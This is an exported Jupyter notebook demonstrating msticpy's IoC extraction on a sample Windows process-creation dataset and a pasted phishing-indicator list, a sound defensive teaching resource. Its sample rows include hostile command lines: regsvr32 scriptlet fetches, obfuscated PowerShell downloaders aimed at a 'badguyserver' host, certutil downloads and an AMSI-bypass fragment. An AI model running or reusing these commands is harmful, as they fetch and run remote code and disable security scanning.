# Imports
import sys
MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
print('or later is selected as the active kernel.')
sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)
from IPython import get_ipython
from IPython.display import display, HTML
import matplotlib.pyplot as plt
import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)
import msticpy
msticpy.init_notebook(globals(), verbosity=0);
# Load test data
process_tree = pd.read_csv('data/process_tree.csv')
process_tree[['CommandLine']].head()
CommandLine | |
---|---|
0 | .\ftp -s:C:\RECYCLER\xxppyy.exe |
1 | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! |
2 | cmd /c "systeminfo && systeminfo" |
3 | .\rundll32 /C 42424.exe |
4 | .\rundll32 /C c:\users\MSTICAdmin\42424.exe |
# get a commandline from our data set
cmdline = process_tree['CommandLine'].loc[78]
cmdline
'netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'
# Instantiate an IoCExtract object
from msticpy.transform.iocextract import IoCExtract
ioc_extractor = IoCExtract()
# any IoCs in the string?
iocs_found = ioc_extractor.extract(cmdline)
if iocs_found:
print('\nPotential IoCs found in alert process:')
display(iocs_found)
Potential IoCs found in alert process:
defaultdict(set, {'ipv4': {'1.2.3.4'}, 'windows_path': {'C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'}})
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'])
if len(ioc_df):
display(HTML("<h3>IoC patterns found in process tree.</h3>"))
display(ioc_df)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
10 | md5_hash | 81ed03caf6901e444c72ac67d192fb9c | 44 | implant.exe 81ed03caf6901e444c72ac67d192fb9c |
11 | url | http://badguyserver/pwnme | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
12 | dns | badguyserver | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
13 | url | http://badguyserver/pwnme | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
14 | dns | badguyserver | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
15 | dns | Invoke-Shellcode.ps | 48 | .\powershell Invoke-Shellcode.ps1 |
16 | dns | Invoke-ReverseDnsLookup.ps | 49 | .\powershell Invoke-ReverseDnsLookup.ps1 |
17 | dns | Wscript.Shell | 67 | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... |
18 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
19 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
20 | ipv4 | 1.2.3.4 | 78 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
21 | dns | wscript.shell | 81 | cmd /c "powershell wscript.shell used to download a .gif" |
22 | dns | abc.com | 90 | c:\Diagnostics\UserTmp\ransomware.exe @ abc.com abc.wallet |
23 | ipv4 | 127.0.0.1 | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
24 | url | http://127.0.0.1/ | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
# IoCExtract docstring
ioc_extractor.extract?
Signature: ioc_extractor.extract( src: str = None, data: pandas.core.frame.DataFrame = None, columns: List[str] = None, **kwargs, ) -> Union[Dict[str, Set[str]], pandas.core.frame.DataFrame] Docstring: Extract IoCs from either a string or pandas DataFrame. Parameters ---------- src : str, optional source string in which to look for IoC patterns (the default is None) data : pd.DataFrame, optional input DataFrame from which to read source strings (the default is None) columns : list, optional The list of columns to use as source strings, if the `data` parameter is used. (the default is None) Other Parameters ---------------- ioc_types : list, optional Restrict matching to just specified types. (default is all types) include_paths : bool, optional Whether to include path matches (which can be noisy) (the default is false - excludes 'windows_path' and 'linux_path'). If `ioc_types` is specified this parameter is ignored. ignore_tlds : bool, optional If True, ignore the official Top Level Domains list when determining whether a domain name is a legal domain. Returns ------- Any dict of found observables (if input is a string) or DataFrame of observables Notes ----- Extract takes either a string or a pandas DataFrame as input. When using the string option as an input extract will return a dictionary of results. When using a DataFrame the results will be returned as a new DataFrame with the following columns: - IoCType: the mnemonic used to distinguish different IoC Types - Observable: the actual value of the observable - SourceIndex: the index of the row in the input DataFrame from which the source for the IoC observable was extracted. IoCType Pattern selection The default list is: ['ipv4', 'ipv6', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sha256_hash'] plus any user-defined types. 'windows_path', 'linux_path' are excluded unless `include_paths` is True or explicitly included in `ioc_paths`. File: e:\src\msticpy\msticpy\transform\iocextract.py Type: method
from html import escape
extractor = IoCExtract()
for ioc_type, pattern in extractor.ioc_types.items():
esc_pattern = escape(pattern.comp_regex.pattern.strip())
display(HTML(f'<b>{ioc_type}</b>'))
display(HTML(f'<div style="margin-left:20px"><pre>{esc_pattern}</pre></div>'))
(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})
(?<![:.\w])(?:[A-F0-9]{0,4}:){2,7}[A-F0-9]{0,4}(?![:.\w])
((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){1,126}[a-z]{2,63}
(?P<protocol>(https?|ftp|telnet|ldap|file)://) (?P<userinfo>([a-z0-9-._~!$&\'()*+,;=:]|%[0-9A-F]{2})*@)? (?P<host>([a-z0-9-._~!$&\'()*+,;=]|%[0-9A-F]{2})*) (:(?P<port>\d*))? (/(?P<path>([^?\#"<>\s]|%[0-9A-F]{2})*/?))? (\?(?P<query>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))? (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?
(?P<root>[a-z]:|\\\\[a-z0-9_.$-]+||[.]+) (?P<folder>\\(?:[^\/:*?"\'<>|\r\n]+\\)*) (?P<file>[^\\/*?""<>|\r\n ]+)
(?P<root>/+||[.]+) (?P<folder>/(?:[^\\/:*?<>|\r\n]+/)*) (?P<file>[^/\0<>|\r\n ]+)
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])
Docstring:
Add an IoC type and regular expression to use to the built-in set.
Parameters
----------
ioc_type : str
A unique name for the IoC type
ioc_regex : str
A regular expression used to search for the type
priority : int, optional
Priority of the regex match vs. other ioc_patterns. 0 is
the highest priority (the default is 0).
group : str, optional
The regex group to match (the default is None,
which will match on the whole expression)
Notes
-----
Pattern priorities.
If two IocType patterns match on the same substring, the matched
substring is assigned to the pattern/IocType with the highest
priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`
and `linux_path` but since `dns` has a higher priority, the expression
is assigned to the `dns` matches.
import re
rcomp = re.compile(r'(?P<pipe>\\\\\.\\pipe\\[^\s\\]+)')
extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=r'(?P<pipe>\\\\\.\\pipe\\[^\s\\]+)')
# Check that it added ok
print(extractor.ioc_types['win_named_pipe'])
# Use it in our data set
ioc_extractor.extract(data=process_tree, columns=['CommandLine']).query('IoCType == \'win_named_pipe\'')
IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0, group=None)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
25 | win_named_pipe | \\.\pipe\blahtest" | 107 | cmd /c "echo blahtest > \\.\pipe\blahtest" |
Parameters
----------
src : str, optional
source string in which to look for IoC patterns
(the default is None)
data : pd.DataFrame, optional
input DataFrame from which to read source strings
(the default is None)
columns : list, optional
The list of columns to use as source strings,
if the `data` parameter is used. (the default is None)
Other Parameters
----------------
ioc_types : list, optional
Restrict matching to just specified types.
(default is all types)
include_paths : bool, optional
Whether to include path matches (which can be noisy)
(the default is false - excludes 'windows_path'
and 'linux_path'). If `ioc_types` is specified
this parameter is ignored.
Returns
-------
Any
dict of found observables (if input is a string) or
DataFrame of observables
Notes
-----
Extract takes either a string or a pandas DataFrame as input.
When using the string option as an input extract will
return a dictionary of results.
When using a DataFrame the results will be returned as a new
DataFrame with the following columns:
- IoCType: the mnemonic used to distinguish different IoC Types
- Observable: the actual value of the observable
- SourceIndex: the index of the row in the input DataFrame from
which the source for the IoC observable was extracted.
IoCType Pattern selection
The default list is: ['ipv4', 'ipv6', 'dns', 'url',
'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
user-defined types.
'windows_path', 'linux_path' are excluded unless `include_paths`
is True or explicitly included in `ioc_paths`.
# You can specify multiple columns
ioc_extractor.extract(data=process_tree, columns=['NewProcessName', 'CommandLine']).head(10)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
extract_df
functions identically to extract
with a data
parameter.
It may be more convenient to use this when you know that your
input is a DataFrame
ioc_extractor.extract_df(process_tree, columns=['NewProcessName', 'CommandLine']).head(10)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).
Note: you will need to set the type of the SourceIndex column. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the SourceIndex (dtype=object) to match the type of your index column.
input_df = data=process_tree.head(20)
output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])
# set the type of the SourceIndex column. In this case we are matching with the default numeric index.
output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])
merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')
merged_df.head()
Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | Computer | SubjectUserSid | SubjectUserName | SubjectDomainName | SubjectLogonId | NewProcessId | NewProcessName | TokenElevationType | ProcessId | CommandLine | ParentProcessName | TargetLogonId | SourceComputerId | TimeCreatedUtc | NodeRole | Level | ProcessId1 | NewProcessId1 | IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:15.677 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1580 | C:\Diagnostics\UserTmp\ftp.exe | %%1936 | 0xbc8 | .\ftp -s:C:\RECYCLER\xxppyy.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:15.677 | source | 0 | NaN | NaN | NaN | NaN | 0 | NaN |
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.167 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x16fc | C:\Diagnostics\UserTmp\reg.exe | %%1936 | 0xbc8 | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.167 | sibling | 1 | NaN | NaN | NaN | NaN | 1 | NaN |
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.277 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1700 | C:\Diagnostics\UserTmp\cmd.exe | %%1936 | 0xbc8 | cmd /c "systeminfo && systeminfo" | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.277 | sibling | 1 | NaN | NaN | NaN | NaN | 2 | NaN |
3 | 3 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.340 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1728 | C:\Diagnostics\UserTmp\rundll32.exe | %%1936 | 0xbc8 | .\rundll32 /C 42424.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.340 | sibling | 1 | NaN | NaN | NaN | NaN | 3 | NaN |
4 | 4 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.400 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x175c | C:\Diagnostics\UserTmp\rundll32.exe | %%1936 | 0xbc8 | .\rundll32 /C c:\users\MSTICAdmin\42424.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.400 | sibling | 1 | NaN | NaN | NaN | NaN | 4 | NaN |
You can use the line magic %ioc
or cell magic %%ioc
to extract IoCs from text pasted directly into a cell
The ioc magic supports the following options:
--out OUT, -o OUT
The variable to return the results in the variable `OUT`
Note: the output variable is a dictionary iocs grouped by IoC Type
--ioc_types IOC_TYPES, -i IOC_TYPES
The types of IoC to search for (comma-separated string)
%%ioc --out ioc_capture
netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
hostname customers-service.ddns.net Feb 5, 2020, 2:20:35 PM 7
URL https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password Feb 5, 2020, 2:20:35 PM 1
hostname mobile.phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 8
hostname youtube.service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 8
hostname www.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
hostname google.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
domain niaconucil.org Feb 5, 2020, 2:20:35 PM 11
domain isis-online.net Feb 5, 2020, 2:20:35 PM 11
domain bahaius.info Feb 5, 2020, 2:20:35 PM 11
domain w3-schools.org Feb 5, 2020, 2:20:35 PM 12
domain system-services.site Feb 5, 2020, 2:20:35 PM 11
domain accounts-drive.com Feb 5, 2020, 2:20:35 PM 8
domain drive-accounts.com Feb 5, 2020, 2:20:35 PM 10
domain service-issues.site Feb 5, 2020, 2:20:35 PM 8
domain two-step-checkup.site Feb 5, 2020, 2:20:35 PM 8
domain customers-activities.site Feb 5, 2020, 2:20:35 PM 11
domain seisolarpros.org Feb 5, 2020, 2:20:35 PM 11
domain yah00.site Feb 5, 2020, 2:20:35 PM 4
domain skynevvs.com Feb 5, 2020, 2:20:35 PM 11
domain recovery-options.site Feb 5, 2020, 2:20:35 PM 4
domain malcolmrifkind.site Feb 5, 2020, 2:20:35 PM 8
domain instagram-com.site Feb 5, 2020, 2:20:35 PM 8
domain leslettrespersanes.net Feb 5, 2020, 2:20:35 PM 11
domain software-updating-managers.site Feb 5, 2020, 2:20:35 PM 8
domain cpanel-services.site Feb 5, 2020, 2:20:35 PM 8
domain service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 7
domain inztaqram.ga Feb 5, 2020, 2:20:35 PM 8
domain unirsd.com Feb 5, 2020, 2:20:35 PM 8
domain phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 7
domain acconut-verify.com Feb 5, 2020, 2:20:35 PM 11
domain finance-usbnc.info Feb 5, 2020, 2:20:35 PM 8
FileHash-MD5 542128ab98bda5ea139b169200a50bce Feb 5, 2020, 2:20:35 PM 3
FileHash-MD5 3d67ce57aab4f7f917cf87c724ed7dab Feb 5, 2020, 2:20:35 PM 3
hostname x09live-ix3b.account-profile-users.info Feb 6, 2020, 2:56:07 PM 0
hostname www.phonechallenges-submit.site Feb 6, 2020, 2:56:07 PM
[('ipv4', ['1.2.3.4']), ('ipv6', ['2:56:07', '2:20:35']), ('dns', ['finance-usbnc.info', 'www.phonechallenges-submit.site', 'acconut-verify.com', 'phonechallenges-submit.site', 'seisolarpros.org', 'youtube.service-activity-checkup.site', 'w3-schools.org', 'isis-online.net', 'two-step-checkup.site', 'recovery-options.site', 'inztaqram.ga', 'system-services.site', 'malcolmrifkind.site', 'instagram-com.site', 'cpanel-services.site', 'niaconucil.org', 'accounts-drive.com', 'software-updating-managers.site', 'www.drive-accounts.com', 'service-issues.site', 'customers-activities.site', 'x09live-ix3b.account-profile-users.info', 'unirsd.com', 'bahaius.info', 'skynevvs.com', 'customers-service.ddns.net', 'leslettrespersanes.net', 'google.drive-accounts.com', 'drive-accounts.com', 'service-activity-checkup.site', 'mobile.phonechallenges-submit.site', 'yah00.site']), ('url', ['https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password']), ('windows_path', ['C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt']), ('linux_path', ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb']), ('md5_hash', ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
# Summarize captured types
print([(ioc, len(matches)) for ioc, matches in ioc_capture.items()])
[('ipv4', 1), ('ipv6', 2), ('dns', 32), ('url', 1), ('windows_path', 1), ('linux_path', 1), ('md5_hash', 2)]
%%ioc --ioc_types "ipv4, ipv6, linux_path, md5_hash"
netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
tracefile2=/usr/localbzzzzzz.sh
hostname customers-service.ddns.net Feb 5, 2020, 2:20:35 PM 7
URL https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password Feb 5, 2020, 2:20:35 PM 1
hostname mobile.phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 8
hostname youtube.service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 8
hostname www.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
hostname google.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
domain niaconucil.org Feb 5, 2020, 2:20:35 PM 11
domain isis-online.net Feb 5, 2020, 2:20:35 PM 11
domain bahaius.info Feb 5, 2020, 2:20:35 PM 11
domain w3-schools.org Feb 5, 2020, 2:20:35 PM 12
domain system-services.site Feb 5, 2020, 2:20:35 PM 11
domain accounts-drive.com Feb 5, 2020, 2:20:35 PM 8
domain drive-accounts.com Feb 5, 2020, 2:20:35 PM 10
domain service-issues.site Feb 5, 2020, 2:20:35 PM 8
domain two-step-checkup.site Feb 5, 2020, 2:20:35 PM 8
domain customers-activities.site Feb 5, 2020, 2:20:35 PM 11
domain seisolarpros.org Feb 5, 2020, 2:20:35 PM 11
domain yah00.site Feb 5, 2020, 2:20:35 PM 4
domain skynevvs.com Feb 5, 2020, 2:20:35 PM 11
domain recovery-options.site Feb 5, 2020, 2:20:35 PM 4
domain malcolmrifkind.site Feb 5, 2020, 2:20:35 PM 8
domain instagram-com.site Feb 5, 2020, 2:20:35 PM 8
domain leslettrespersanes.net Feb 5, 2020, 2:20:35 PM 11
domain software-updating-managers.site Feb 5, 2020, 2:20:35 PM 8
domain cpanel-services.site Feb 5, 2020, 2:20:35 PM 8
domain service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 7
domain inztaqram.ga Feb 5, 2020, 2:20:35 PM 8
domain unirsd.com Feb 5, 2020, 2:20:35 PM 8
domain phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 7
domain acconut-verify.com Feb 5, 2020, 2:20:35 PM 11
domain finance-usbnc.info Feb 5, 2020, 2:20:35 PM 8
FileHash-MD5 542128ab98bda5ea139b169200a50bce Feb 5, 2020, 2:20:35 PM 3
FileHash-MD5 3d67ce57aab4f7f917cf87c724ed7dab Feb 5, 2020, 2:20:35 PM 3
hostname x09live-ix3b.account-profile-users.info Feb 6, 2020, 2:56:07 PM 0
hostname www.phonechallenges-submit.site Feb 6, 2020, 2:56:07 PM
[('ipv4', ['1.2.3.4']), ('ipv6', ['2:56:07', '2:20:35']), ('linux_path', ['/usr/localbzzzzzz.sh', '//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb']), ('md5_hash', ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
The decoding functionality is also available in a pandas extension mp_ioc
.
This supports a single method extract()
.
This supports the same syntax
as extract
(described earlier).
process_tree.mp.ioc_extract(columns=['CommandLine'])
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
10 | md5_hash | 81ed03caf6901e444c72ac67d192fb9c | 44 | implant.exe 81ed03caf6901e444c72ac67d192fb9c |
11 | url | http://badguyserver/pwnme | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
12 | dns | badguyserver | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
13 | url | http://badguyserver/pwnme | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
